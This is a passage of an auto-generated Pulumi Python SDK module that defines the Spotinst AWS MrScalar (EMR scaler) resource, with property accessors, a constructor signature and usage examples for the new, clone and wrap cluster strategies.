return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_up_policies")
@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "output_cluster_id")
@output_cluster_id.setter
def output_cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "output_cluster_id", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "visible_to_all_users", value)
class MrScalar(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides a Spotinst AWS MrScaler resource.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
